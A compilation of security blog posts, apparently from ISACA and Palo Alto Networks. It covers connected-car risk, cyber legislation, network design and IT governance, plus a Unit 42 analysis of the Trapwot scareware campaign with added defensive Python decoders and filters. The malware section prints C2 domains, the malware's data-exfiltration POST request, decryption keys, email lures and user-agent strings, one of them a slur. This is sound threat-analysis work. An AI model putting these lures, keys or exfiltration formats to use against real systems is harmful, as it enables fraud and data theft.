Connected Cars—Is the Risk Worth the Reward?

There is a revolution taking place in the automotive industry that will affect nearly every car owner, driver and passenger. It is the introduction of connected cars and the promise of enhanced safety and convenience.

With that promise comes massive security and privacy risk. After all, cars will be operated by highly intelligent computing devices that can be accessed remotely. Driver override will be built-in, but malicious tampering is possible. And in this case, there is absolutely no margin for error.

Having connected cars is fantastic and is the way the industry and society have been progressing, but not without questioning the concept and not without the assurance that the system cannot be compromised. It is critical that we assure customers that a hacker cannot take over operation of the vehicle. And so far, it has been demonstrated that such a takeover is possible today.

The benefits can go from having metrics about your driving style to preventing an accident. For example, a connected car can know the best route and where gas stations or restaurants are located. Although you could have these tools on other devices, the real value comes from optimizing fuel consumption and providing the best advice on how to drive safely and even taking control (with the right parameters in place), if necessary. A connected car is, or can be, intelligent, autonomous and smart.

The safety benefits of connected cars are very clear. A driver in a dangerous situation can be located, the car can be traced if stolen and the vehicle could potentially be locked if the driver is not the approved one. On the other hand, we need to understand that we are talking about identity management, authenticity and accountability. We need to understand that data can potentially be used against us if we do something wrong while driving.

As a potential user of a connected car, I would first ask what is really at stake. I would think about all the “what if” scenarios so I could fully understand the different roles the car will play in terms of advice, taking control, providing information and collecting information. Let me emphasize the importance of not only being a driving aid (which is at the core of a connected car), but that it also collects and potentially shares information about driving behaviors. I would try to clearly understand all aspects of privacy when purchasing a car that will “learn” a great amount of information about me.

Protecting user information is critical, in both technical and legal terms. In terms of technical protection, vendors need to ensure that the system is robust and solid, that it has been hardened and that it is impossible to access it from places other than the “guaranteed” ones. If we consider a system that cannot be accessed remotely and does not allow a third party to take control of the car, that would make the vehicle less connected—which is something that we do not want. Thus, we have to ensure that the proper communication channels have been established. For this, vendors must be certain that the technology they deploy is safe and bug-free. On the legal side, a driver will have to agree to the collection and sharing of personal information. That is something that can fundamentally change and challenge our approach to driving.

It has been proven that hackers can take control of some models of electric cars. Remember, there’s a computer inside the car, standard protocols to connect to the Internet and operating systems that might have some flaws. Millions of cars provide a good customer base for the bad guys to try. And, while that may not make the bad guys money, it will certainly be something governments must monitor since a terrorist attack on thousands of vehicles would have a massive impact on society.

As with previous advances in technology, our prediction is that the market for connected cars will expand and change very rapidly. As a society, we will have to look at the legal ramifications and accept the sharing of data. If we accept that, we accept things such as the car taking control in heavy traffic. Sometimes we are pushed by technology that we do not really understand, but that is nice for us to use. We believe that focusing only on the benefits is short-sighted and we always appreciate the risk assessment approach—understanding what is at stake and if the benefits outweigh the risks or not.

Integrity is key in every security program, and even more so with connected cars. Making sure that the information is correct, and that it has not been altered by a third party is critical to success. A connected car, and the way it collects and correlates information, will be transparent for the user, much like a black box on a plane. Integrity is fundamental so that we know that data is the original and reliable. This is one of the key aspects of the validity of the information of a connected car.

Ramses Gallego
Security strategist and evangelist, Dell Software
ISACA International Vice President

[ISACA]

Trapwot Scareware Activity Spikes in April

In recent weeks, Unit 42 has been monitoring a new e-mail campaign distributing the Trapwot malware family. The Trapwot malware family is considered “scareware” or “rogue antivirus” because it attempts to mislead victims into believing their machine is infected with malware. It disguises itself as an anti-virus product and attempts to pressure users into purchasing non-existent protection.

In total, our AutoFocus threat intelligence service has collected 380,000 emails carrying Trapwot in the past 30 days. These 380,000 e-mails have contained over 5,400 unique malware samples. These attacks have primarily targeted the insurance, higher education, and healthcare industries.

Trapwot is just one of many variants of Rogue Antivirus programs that currently plague users. Readers should be skeptical of pop-ups that suggest their system is infected with malware and ask them to purchase a new product. As always, users should also avoid opening attachments delivered over e-mail that they are not expecting, no matter how enticing the content may be.

Malware Distribution and Targets

The attackers behind Trapwot are distributing it via e-mail, likely through a spam botnet. The following world map demonstrates the distributed nature of the origin of these emails.

Figure 1. Trapwot Source Countries Shown in AutoFocus

Figure 2. Trapwot E-mail Timeline in AutoFocus

Executables with a filename suffix of ‘.scr’ were attached to emails distributed in this campaign. Filenames varied; however, they were typically formatted in one of the following ways:

  • DOC_[random_numbers]-PDF.scr
  • PIC[random_numbers]-JPG.scr

Subjects for these emails varied as well. For emails sent with the ‘DOC_’ attachment names, the following subjects were seen.

  • Read as soon as possible
  • Document #87
  • Order #371
  • Your order #624
  • Important

Additionally, for emails sent with the ‘PIC’ attachment names, the following subjects were seen.

  • Pretty or ugly?
  • Should I upload this picture on facebook?
  • My private photo for you
  • Do you think I’m attractive?
  • Check out this picture
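As an added example (not code from the Unit 42 report), the following Python triage filter turns the two attachment-name shapes and the subject lures listed above into a check that can be run over mail-log records. The records it runs on are constructed for the example; the patterns and subjects are the ones reported.

```python
import re

# Attachment-name shapes reported for the campaign: DOC_<digits>-PDF.scr and PIC<digits>-JPG.scr.
CAMPAIGN_ATTACHMENT = re.compile(r"^(?:DOC_\d+-PDF|PIC\d+-JPG)\.scr$", re.IGNORECASE)

# Subjects reported for the campaign, lower-cased with the curly apostrophe normalised.
CAMPAIGN_SUBJECTS = {
    "read as soon as possible", "document #87", "order #371", "your order #624", "important",
    "pretty or ugly?", "should i upload this picture on facebook?", "my private photo for you",
    "do you think i'm attractive?", "check out this picture",
}


def _norm(subject):
    return subject.replace("\u2019", "'").strip().lower()


def classify_message(subject, attachments):
    """Return the indicators that matched; an empty list means nothing looked like the campaign."""
    reasons = []
    for name in attachments:
        if CAMPAIGN_ATTACHMENT.match(name):
            reasons.append(f"attachment name matches campaign pattern: {name}")
        elif name.lower().endswith(".scr"):
            # Not the campaign's naming, but an executable screensaver attachment merits review anyway.
            reasons.append(f"executable .scr attachment: {name}")
    if _norm(subject) in CAMPAIGN_SUBJECTS:
        reasons.append(f"subject matches campaign lure: {subject!r}")
    return reasons


def triage(messages):
    """messages: iterable of (message_id, subject, [attachment names]); returns the ids worth review."""
    return [mid for mid, subject, attachments in messages if classify_message(subject, attachments)]


# Constructed mail-log records (not from the report) for a dry run.
SAMPLE_MESSAGES = [
    ("m1", "Your order #624", ["DOC_8832911-PDF.scr"]),
    ("m2", "Check out this picture", ["PIC9811322311-JPG.scr"]),
    ("m3", "Q2 budget", ["budget.xlsx"]),
    ("m4", "Weekly report", ["report.pdf", "notes.scr"]),
]

if __name__ == "__main__":
    for mid, subject, attachments in SAMPLE_MESSAGES:
        print(mid, classify_message(subject, attachments) or "clean")
```

The subject match alone is weak (the lures are generic), so the filter reports each indicator separately and lets the reviewer weigh an attachment-name hit more heavily than a subject-only hit.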

The spam email itself largely targeted the insurance and higher education industries, with roughly 120,000 and 93,000 emails received respectively. (Please note that the 120,000 number for insurance is slightly misleading as all but 1,600 of those emails were received by a single, large insurance company.)

The healthcare industry has also seen roughly 31,000 emails carrying Trapwot.

Figure 3. Trapwot Targeted Industries in AutoFocus

Overall, the malware is primarily seen targeting the United States. However, the high number of samples targeting the large insurance provider likely accounts for this. As we can see in the diagram below, this malware is being distributed to many countries across the globe.

Figure 4. Trapwot Destination Countries Shown in AutoFocus

Stage One Downloader

In the event an unsuspecting user were to open one of the attached executable files, the malware would download a remote executable file to the victim’s machine prior to executing it.

A number of obfuscated strings are encountered within the stage one downloader. The following function is used to decode these strings:

Please refer to this IDAPython script that may be used to automatically decrypt strings encountered in the stage one downloader. These decoded strings are used to both load functions and libraries dynamically, as well as to obfuscate the URLs embedded within the malware. The following URLs were discovered in this sample.

The second stage is downloaded using a minimalistic HTTP request, as we can see below.

Figure 5. Stage One Downloader HTTP Request

The user-agents witnessed in this campaign demonstrate a sense of immaturity on the attacker’s part. Other user-agents witnessed include the following:

  • wutz0r
  • supz0r
  • jackpot
  • cashmayne
  • cash
  • letsgo
  • faggots
  • checkin
  • kash
  • suckmyballz

Once downloaded, the file is written to %TEMP%\winmgr.exe. It is then executed using a call to the CreateProcessA function. Finally, the malware displays a message box with the following text.

Title: Microsoft Photo Viewer
Message: windrcs32.dll cannot be found.

This sample had the original filename of ‘PIC9811322311-JPG.scr,’ which explains why the message box has the title of ‘Microsoft Photo Viewer.’

Stage Two Downloader and Trapwot

When the stage two payload is executed, the malware begins by decrypting embedded URLs within the file using a single-byte XOR key of 0x65. Once decrypted, the following domains were discovered in this particular sample:

  • updatemarketltd[.]in
  • mastertodayversion[.]eu

Stage two proceeds to check the current time and make a comparison against a statically set time. In the event the current time is later than this time, no malicious activity will occur.

Figure 6. Stage Two Kill Timer

In addition to the single-byte XOR string encryption, the stage two downloader also encrypts a number of strings using the XXTEA encryption algorithm. The following static key, represented in hexadecimal notation, is used to decrypt these embedded encrypted strings.

61 C3 5E A9 E2 8F 4E D4 D4 DB 6D 1B 9A 3E 93 08

Please refer to this IDAPython script that may be used to decrypt these strings.
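The IDAPython script is not reproduced here, so as an added example (not the report's own script) here is a stand-alone Python XXTEA implementation keyed with the 16 bytes listed above. It follows the reference “btea” routine; reading the key and data as little-endian 32-bit words, and NUL-padding plaintext to at least two words, are assumptions about how this sample uses the cipher. The sample string it encrypts and recovers is constructed, since the report does not print any ciphertext.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF

# The 16-byte XXTEA key listed in the report. Treating it as four little-endian
# uint32 words is an assumption about how this sample loads the key.
TRAPWOT_XXTEA_KEY = bytes.fromhex("61C35EA9E28F4ED4D4DB6D1B9A3E9308")


def _mx(sum_, y, z, p, e, k):
    # The XXTEA mixing function from the reference "btea" routine, masked to 32 bits.
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4)))
            ^ ((sum_ ^ y) + (k[(p & 3) ^ e] ^ z))) & MASK


def xxtea_encrypt_words(v, key):
    """Encrypt a list of >= 2 uint32 words in place (reference btea coding part)."""
    n = len(v)
    k = struct.unpack("<4I", key)
    rounds = 6 + 52 // n
    sum_ = 0
    z = v[n - 1]
    for _ in range(rounds):
        sum_ = (sum_ + DELTA) & MASK
        e = (sum_ >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + _mx(sum_, y, z, p, e, k)) & MASK
            z = v[p]
        y = v[0]
        v[n - 1] = (v[n - 1] + _mx(sum_, y, z, n - 1, e, k)) & MASK
        z = v[n - 1]
    return v


def xxtea_decrypt_words(v, key):
    """Decrypt a list of >= 2 uint32 words in place (reference btea decoding part)."""
    n = len(v)
    k = struct.unpack("<4I", key)
    rounds = 6 + 52 // n
    sum_ = (rounds * DELTA) & MASK
    y = v[0]
    for _ in range(rounds):
        e = (sum_ >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - _mx(sum_, y, z, p, e, k)) & MASK
            y = v[p]
        z = v[n - 1]
        v[0] = (v[0] - _mx(sum_, y, z, 0, e, k)) & MASK
        y = v[0]
        sum_ = (sum_ - DELTA) & MASK
    return v


def _to_words(data):
    # NUL-pad to whole 32-bit words and to at least two words (assumed convention, not the sample's).
    data = data + b"\x00" * (-len(data) % 4)
    if len(data) < 8:
        data = data + b"\x00" * (8 - len(data))
    return list(struct.unpack("<%dI" % (len(data) // 4), data))


def _from_words(words):
    return struct.pack("<%dI" % len(words), *words)


def xxtea_encrypt(plaintext, key=TRAPWOT_XXTEA_KEY):
    return _from_words(xxtea_encrypt_words(_to_words(plaintext), key))


def xxtea_decrypt(ciphertext, key=TRAPWOT_XXTEA_KEY):
    """Decrypt a blob (>= 8 bytes, multiple of 4) and strip the NUL padding."""
    if len(ciphertext) % 4 or len(ciphertext) < 8:
        raise ValueError("XXTEA ciphertext must be at least 8 bytes and a multiple of 4")
    words = list(struct.unpack("<%dI" % (len(ciphertext) // 4), ciphertext))
    return _from_words(xxtea_decrypt_words(words, key)).rstrip(b"\x00")


# Constructed sample: an API name encrypted with the report's key, then recovered.
SAMPLE_PLAINTEXT = b"LoadLibraryA"
SAMPLE_CIPHERTEXT = xxtea_encrypt(SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(SAMPLE_CIPHERTEXT.hex())
    print(xxtea_decrypt(SAMPLE_CIPHERTEXT))
```

When applying this to a real sample, the two things to confirm in the disassembly before trusting the output are the word endianness of the key and whether the malware encodes the plaintext length separately rather than relying on padding.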

The malware proceeds to collect the following information from the victim machine. This information will be exfiltrated when the sample downloads Trapwot shortly.

  • Microsoft Windows Operating System Version
  • Operating System Language
  • Malware Install Path
  • Default Web Browser
  • Malware Process Integrity Level

Once this data has been collected, the malware will attempt to send the following POST request.

POST /a/offers?i=0&u=548621bc51c9415ebaba30e0a9c1d8bb&f=1&v=21&a=119 HTTP/1.1
Host: mastertodayversion[.]eu
Content-Length: 69
Cache-Control: no-cache

[binary content]

In the above request, four of the GET parameters have been identified:

i : Incrementing counter
u : Victim machine GUID
f : Static value; potentially indicates the version of the malware
a : Integer generated from bytes one and two of the executable’s PE timestamp

The following example binary content is sent in this POST request.

00000000  b0 a1 a5 a5 95 a5 a5 b7  a1 a5 a3 a4 14 b8 b6 a7
00000010  a5 ac a1 b3 81 a5 e6 9f  f9 f0 d6 c0 d7 d6 f9 e4
00000020  c1 c8 cc cb cc d6 d1 d7  c4 d1 ca d7 f9 c8 c9 d2
00000030  d7 fa d6 c8 d5 c9 8b c0  dd c0 b1 ad a5 cc c0 dd
00000040  d5 c9 ca d7 c0

This binary data is first encrypted using a single-byte XOR key of 0xA5. The underlying data has the following structure.

Figure 7. Victim Information Data Structure

This data includes the previously gathered victim information. Please refer to this provided Python script that can be used to decrypt and parse this data.
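The referenced Python script is not reproduced on this page, so as an added example (not the report's script) here is a decoder that applies the 0xA5 XOR to the 69 bytes of the POST body shown above and walks the result. The record layout it parses (a one-byte tag, a little-endian two-byte length, then the value) and the field names are inferred here from the decoded bytes and the list of collected items; they are not taken from the report's Figure 7. The same `xor_single_byte` helper serves the 0x65-keyed URL strings mentioned earlier.

```python
import struct


def xor_single_byte(data, key):
    """Apply a single-byte XOR key to every byte (XOR is its own inverse, so this also decodes)."""
    return bytes(b ^ key for b in data)


# The 69-byte POST body from the report's hex dump (Content-Length: 69), copied verbatim.
SAMPLE_POST_BODY = bytes.fromhex(
    "b0a1a5a595a5a5b7a1a5a3a414b8b6a7"
    "a5aca1b381a5e69ff9f0d6c0d7d6f9e4"
    "c1c8cccbccd6d1d7c4d1cad7f9c8c9d2"
    "d7fad6c8d5c98bc0ddc0b1ada5ccc0dd"
    "d5c9cad7c0"
)

# Tag meanings inferred from the decoded values; assumptions, not the report's own labels.
FIELD_NAMES = {
    0x12: "os_version",
    0x13: "os_language_id",
    0x14: "default_browser",
    0x15: "process_integrity_level",
    0x16: "install_path",
}


def decode_field(tag, raw):
    """Render one field's value; unknown tags are returned as hex."""
    if tag == 0x12 and len(raw) == 4:      # major, minor, build (uint16 LE)
        major, minor, build = raw[0], raw[1], struct.unpack_from("<H", raw, 2)[0]
        return f"{major}.{minor} build {build}"
    if tag == 0x13 and len(raw) == 2:      # Windows language identifier
        return f"0x{struct.unpack('<H', raw)[0]:04x}"
    if tag == 0x15 and len(raw) == 4:      # mandatory integrity RID (0x3000 is SECURITY_MANDATORY_HIGH_RID)
        return f"0x{struct.unpack('<I', raw)[0]:04x}"
    if tag in (0x14, 0x16):
        return raw.decode("ascii", errors="replace")
    return raw.hex()


def parse_victim_info(body, key=0xA5):
    """XOR-decode the POST body and walk its tag(1) / length(2, LE) / value records."""
    plain = xor_single_byte(body, key)
    fields = {}
    pos = 0
    while pos < len(plain):
        if pos + 3 > len(plain):
            raise ValueError(f"truncated record header at offset {pos}")
        tag = plain[pos]
        length = struct.unpack_from("<H", plain, pos + 1)[0]
        raw = plain[pos + 3 : pos + 3 + length]
        if len(raw) != length:
            raise ValueError(f"record 0x{tag:02x} at offset {pos} claims {length} bytes, {len(raw)} present")
        fields[FIELD_NAMES.get(tag, f"tag_0x{tag:02x}")] = decode_field(tag, raw)
        pos += 3 + length
    return fields


if __name__ == "__main__":
    for name, value in parse_victim_info(SAMPLE_POST_BODY).items():
        print(f"{name:>25}: {value}")
```

Run against the bytes from the report, the decoder yields a Windows 6.1 build 7601 host, language 0x0409, a high-integrity process, an install path under the Administrator profile and “iexplore” as the default browser, which lines up with the five items the report says are collected. The length checks matter: a sandboxed sample that emits a truncated body should fail loudly rather than produce a partial, misleading record.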

Should the remote server be active, it will respond with binary content that includes an encrypted DLL file. This binary content has the following structure.

Figure 8. Trapwot Downloaded DLL Structure

This DLL is encrypted and written to disk. Finally, the stage two downloader will identify the DLL’s EntryPoint prior to calling this function.

This DLL contains the actual Trapwot malware itself, which is responsible for spawning a fake anti-virus scanner and encouraging victims to buy the phony product, as seen below. Additionally, the malware may block access to legitimate websites and/or websites belonging to legitimate anti-virus vendors.

Figure 9. False ‘Security Defender’ Scanner

Figure 10. False ‘Action Center’ Display

Figure 11. False Virus Detection Alert

Figure 12. Trapwot False Purchase Page

Conclusion

Overall, Trapwot is not an especially new malware family, as it dates back to early November 2014. However, the malware is certainly dangerous, as it can hinder performance and functionality on an infected machine. The Palo Alto Networks AutoFocus platform enabled Unit 42 to identify and track this campaign, which accounted for hundreds of thousands of emails. This particular campaign targeted a large number of clients in the previous weeks.

Readers should be skeptical of pop-ups that suggest their system is infected with malware and ask them to purchase a new product. As always, users should also avoid opening attachments delivered over e-mail that they are not expecting, no matter how enticing the content may be.

Appendix A – Sample Information

Stage One Downloader

MD5 9f3ab8fb7d2fa7a468fdfd950471c251
SHA1 96a5e3f30b983847cce5452c12ab07d8efb46f12
SHA256 26285f4d32235ea966824e662d694de41bdebe5d28d5041df902848380f8ce8b
File Type PE32 executable (GUI) Intel 80386, for MS Windows
File Size 20800 Bytes
Entropy 4.701195
Compile Timestamp 2015-04-19 09:53:58 UTC

Stage Two Downloader

MD5 924b94b8432296662b708bcea9f377ad
SHA1 d84e62cccb831b6c90186034262f9794e4be0e8f
SHA256 069fe64f235d46a1f89b26f273f509af98ee4a59d60ee358c66b1ea60666aecb
File Type PE32 executable (GUI) Intel 80386, for MS Windows
File Size 28672 Bytes
Entropy 4.554719
Compile Timestamp 2015-05-01 10:27:46 UTC

Trapwot

MD5 502360b810b84aa06c1c6dda35aa8be0
SHA1 6c9449f90ec155581dd18b238c7ffeb96279f187
SHA256 cbd7570974525a833589b29463a694bdaa9be8a7563ce828f2c8072354dcd731
File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
File Size 408580 Bytes
Entropy 7.129451
Compile Timestamp 2015-05-05 10:10:49 UTC

[Palo Alto Networks Blog]

New US Congressional Bills Are an Important Milestone for Cybersecurity Professionals

News over the past year has focused the world’s attention on issues surrounding cybersecurity—notably that cyber attacks emerged as a top technology risk in the World Economic Forum’s Global Risks 2015 report. In April, US President Barack Obama declared cybercrime a national emergency and signed an executive order authorizing new sanctions against individuals and groups deemed responsible for cyberattacks.

The attention resonated with consumers, business leaders and legislators alike.

Mixed together with news of the Sony Corporation breach and other retail hacking occurrences, awareness of the need for increased cybersecurity focus has been at a high level. Now there is even more—but this time the news is about the US House of Representatives passage of two cybersecurity information sharing bills: Protecting Cyber Networks Act (PCNA) and National Cybersecurity Protection Advancement (NCPA) Act.

  • PCNA aims to defend against cyberattacks through the creation of a framework for the voluntary sharing of cyber threat information between private entities and the federal government. Importantly, it includes liability protection for those companies who choose to participate.
  • NCPA is similar to PCNA, with the distinction being that it encourages voluntary information sharing about cyber threats between the private sector and the Department of Homeland Security.

To help cybersecurity professionals understand the importance of these two new acts, ISACA has added a new CSX Special Report to its Cybersecurity Legislation Watch center as part of its Cybersecurity Nexus (CSX). I encourage you to take a look at the report to better understand the two acts and what this new legislation could mean for you in your role and for your enterprise.

For cybersecurity professionals, the implication is crystal clear. The general business community is more aware of the challenges, and those charged with protecting their organizations from attack must be highly aware and trained, including being knowledgeable of evolving legislation such as this.

Keeping current and positioning your organization to best take advantage of the evolving regulatory landscape is of utmost importance in today’s fast-moving cybersecurity environment. This is not a time to be caught flat-footed.

Douglas Rausch, CISSP
President, Aurora CyberSecurity Consultants, Inc.

[ISACA]

When it Comes to Networking, Keep It Simple

Networking is fun. It should also be pragmatic. The goal should be to get traffic from Point A to Point B as efficiently and securely as possible.

There are many networks in production that have been architected like a service provider network, or how networking companies want them designed.  This is not to say that these networks aren’t providing service, as they all are, just not likely with the scaling requirements of an ISP. These designs are likely implemented by people who love networking and just want to see as much of it as possible, at the expense of being impractical and expensive.

Here’s an example of what I’ve described:

The architecture above contains:

  • Border Routers that connect to the Internet and are the first hop for the IPs provided by the ISP
  • Core Routers or Switches that handle routing between internal networks
  • Distribution Routers or Switches that aggregate Access Switches. They will either pass traffic between locally connected access switches or forward traffic to the core to be routed
  • Access Switches that provide physical Ethernet connectivity for endpoints (clients and servers)
  • Security Gateways that may include multiple layers of firewalls, Network IPS, Web Gateways, and Email Gateways

There are usually a few other ancillary network elements as well: routers to connect to partner networks, proxy servers, VPN concentrators, and legacy environments that people are reluctant to change because they have been in place for years.

While highly scalable, for most enterprises (outside of ISPs) an environment like this is too much; like putting out a match with a fire hose.

Due to its complexity, this architecture would have a high capex and operational cost, as well as many potential points of failure. The most serious problem with this design though is its blind spots and lack of visibility. Specifically, because much of the internal traffic would travel from an endpoint, to a switch, then to another switch without hitting the security gateways it cannot be scrutinized. This is troubling from a security perspective as it’s estimated that during most network breaches the attacker makes six lateral movements once inside the network environment. The attacker makes these lateral moves in order to find the data they want, and then find an exit point. This lateral movement needs to be accounted for in any network security policy.

For better management and security, much of the functionality presented above should be collapsed into much fewer layers.

  1. Firewalls
  2. Access/Distribution Switches

In this architecture, the Internet connection would terminate at security gateways. In order to ensure a high-availability Internet connection, it is recommended that the firewalls each have two cable connections to the ISP (two connections to different ISPs is also possible).  If necessary we implement dynamic routing protocols like BGP for high availability or OSPF for MPLS across the WAN interfaces of the security gateways.  Threat modules should be enabled on the security gateways to perform network intrusion prevention and malware prevention.  All site-to-site and client based VPNs should terminate at the security appliances, too.

Policy switches should connect to the security gateways’ inside interfaces as directly as possible, with as few other switch hops as possible. The switches should be configured in layer 2 mode only, and all layer 3 VLANs should terminate at the security gateways. This allows traffic to be routed from the access switches up to the security gateways so that security policy is applied to as much internal traffic as possible. If the number of access switches required outnumbers the ports on the security gateway, then distribution switches must be introduced to aggregate the physical access switch uplinks, as depicted in the diagram above. The distribution switches will then have trunks connecting to the security gateways.

With a next generation security platform, access control and security change dramatically. For example, imagine the simple scenario of IT engineers needing access to the servers to keep things running. If there are only VLANs between the LAN network and the server network, then there is no real room for access control. Anyone can move between these two networks as long as they have credentials.

However, if there were a firewall between these networks, a policy would need to be implemented. Each engineer, upon joining the organization, would need to request a static IP address, which takes time. From there they request access into the server network from that static IP address. The firewall team will update the policy with the new user’s source IP address, and the destinations will likely be a long list of IP addresses and TCP and UDP services. The challenges here are that anyone can take that static IP and assign it to their computer. It also means that the administrator is restricted to a certain physical location (wherever their endpoint is located) when they access the server. Finally, as people leave the organization the policy is never updated and becomes unwieldy.

In this same environment a much simpler and more secure policy could be enabled. The source of the management traffic could be matched against the Active Directory user group for the IT engineers rather than (or in addition to) a static IP address. As soon as an engineer is added to or removed from Active Directory, their access across the network is also added or removed. Rather than using ports and protocols that can be abused by malicious actors, the actual applications required (RDP, SSH) can be allowed and everything else blocked. And finally, by enabling network intrusion prevention and anti-malware, malicious behavior can be prevented.
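To make the contrast between the two policies concrete, here is an added Python model (not vendor code, and not tied to any particular firewall's configuration syntax) that evaluates the same four flows under an address-and-port rule and under a group-and-application rule. The networks, addresses, user names and group membership are all constructed for the example; the application labels stand in for whatever the firewall's own identification produces.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Flow:
    src_ip: str
    user: Optional[str]   # identity the firewall has mapped to src_ip (None if it has no mapping)
    dst_ip: str
    dst_port: int
    app: str              # application identified from the traffic itself, e.g. "rdp", "ssh", "smb"


SERVER_NET = ipaddress.ip_network("10.2.0.0/24")   # constructed server network

# Legacy policy: hand-maintained source addresses plus destination ports.
LEGACY_RULES = [
    {"src_ips": {"10.1.1.50", "10.1.1.51"}, "dst_net": SERVER_NET, "ports": {3389, 22}},
]

# Identity policy: a directory group plus the applications that group may use (constructed membership).
DIRECTORY_GROUPS = {"it-engineers": {"alice", "bob"}}
IDENTITY_RULES = [
    {"src_group": "it-engineers", "dst_net": SERVER_NET, "apps": {"rdp", "ssh"}},
]


def legacy_decision(flow, rules=LEGACY_RULES):
    dst = ipaddress.ip_address(flow.dst_ip)
    for rule in rules:
        if flow.src_ip in rule["src_ips"] and dst in rule["dst_net"] and flow.dst_port in rule["ports"]:
            return "allow"
    return "deny"


def identity_decision(flow, rules=IDENTITY_RULES, groups=DIRECTORY_GROUPS):
    dst = ipaddress.ip_address(flow.dst_ip)
    for rule in rules:
        members = groups.get(rule["src_group"], set())
        if flow.user in members and dst in rule["dst_net"] and flow.app in rule["apps"]:
            return "allow"
    return "deny"


def compare(flow, groups=DIRECTORY_GROUPS):
    return {"legacy": legacy_decision(flow), "identity": identity_decision(flow, groups=groups)}


# Constructed flows covering the situations described in the text.
SCENARIOS = {
    # an engineer at the registered desktop: both policies allow
    "engineer_at_desk": Flow("10.1.1.50", "alice", "10.2.0.10", 3389, "rdp"),
    # the same engineer from a laptop on another subnet: the legacy rule is tied to one address
    "engineer_roaming": Flow("10.1.7.23", "alice", "10.2.0.10", 22, "ssh"),
    # the engineer's static address reused by another machine carrying non-RDP traffic on 3389
    "ip_reuse": Flow("10.1.1.50", "mallory", "10.2.0.10", 3389, "smb"),
    # bob's address entry was never removed from the legacy rule after he left
    "departed_user": Flow("10.1.1.51", "bob", "10.2.0.10", 3389, "rdp"),
}


def run_scenarios(groups=None):
    """Evaluate every scenario; pass a groups mapping to model a directory change (e.g. bob removed)."""
    groups = DIRECTORY_GROUPS if groups is None else groups
    return {name: compare(flow, groups) for name, flow in SCENARIOS.items()}


if __name__ == "__main__":
    after_bob_left = {"it-engineers": {"alice"}}
    for name, verdicts in run_scenarios(after_bob_left).items():
        print(f"{name:>18}: legacy={verdicts['legacy']:<5} identity={verdicts['identity']}")
```

The point the model makes is that removing bob from the directory group is the only change needed for the identity policy to stop allowing his old flows, whereas the legacy rule keeps allowing that address until someone edits the firewall. Whether the real deployment gets that property depends on the user-to-IP mapping being reliable, so that mapping source (agent, authentication logs, or similar) deserves the same monitoring as the rule base itself.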

In summary, these are the benefits to this design:

  1. Capital cost savings – We have eliminated at least three layers of physical appliances.  While the cost of individual security gateways may increase due to their larger capacity, there is still cost savings of approximately 50 percent on overall equipment costs due to the reduction in hardware.
  2. Operational cost savings – The complex routing and filtering is now being done on a single security gateway (or HA pair).  Most daily modifications and troubleshooting will occur on a single pair of devices.  The switches can all be in simple layer 2 mode.  This means fewer devices need to be examined when there’s a problem, which saves time.  Because the operational team will be spending most of their time in the security appliances, they will quickly develop stronger security skills which will also reduce the time taken to make repairs.  There will be additional operations savings as less rack space, power, and cooling are required.
  3. Better security – The more traffic that we route on an internal core network, the less traffic will be visible to the security gateways.  By putting the default gateway for all networks on the security gateway, traffic between those networks will be scrutinized.

With the increase in the use of virtual machines in modern datacenters, it is important to ensure that the security platform you select can be deployed in virtual and public cloud environments to provide continuity.

Complexity and obscurity are the real enemies of security and availability. Simplicity and efficiency are key allies.

[Palo Alto Networks Blog]

How to Create a GEIT System that Delivers Value

Governance is vital to accomplishing the goals of an enterprise. By its very definition, governance of enterprise IT (GEIT) places a structure around how an organization aligns IT strategy with business strategy, ensuring that companies stay on track to achieve goals and implement methods to measure performance.

To be successful, an enterprise needs to manage expectations and satisfy stakeholder requirements—the drivers behind development of enterprise goals and subsequent IT-related goals. These goals must be in alignment and are best created with the full cooperation and involvement of IT and the stakeholders.

While governance is critical to any enterprise, form does not always follow function, resulting in many different pathways to successful implementation. In short, there seems to be no agreed-upon approach.

How do you get there—how do you start?

One valuable new resource is ISACA’s white paper, “Getting Started with GEIT.” The white paper outlines how an enterprise can begin the process of understanding needs and how to take that knowledge and put it into action.

It summarizes how using a well-established framework, such as COBIT 5, assists in creating a common language and understanding of governance concepts throughout the enterprise.

For example, the early benefits of using a framework include:

  • Deliver value to stakeholders.
  • Accomplish established stakeholder goals.
  • Make future change easier to accomplish.
  • Establish a framework that is part of the enterprise culture.
  • Strengthen internal control.
  • Rely less on external parties.
  • Enhance credibility of internal resources.

One item to note is that no matter what new framework is introduced, the timing of its introduction should be sensitive to the general business environment or commitment to its adoption could prove difficult.

The beauty of a successful framework is that its strength resides in its flexibility. It offers guidance, not prescriptive steps in what to do. The end result? Risks to the enterprise are significantly reduced and overall value quickly recognized.

Joanne De Palma, CISM, BCMM Assessor, MBA
Director, Global Information Technology Risk Management – ORM
PFI

[ISACA]
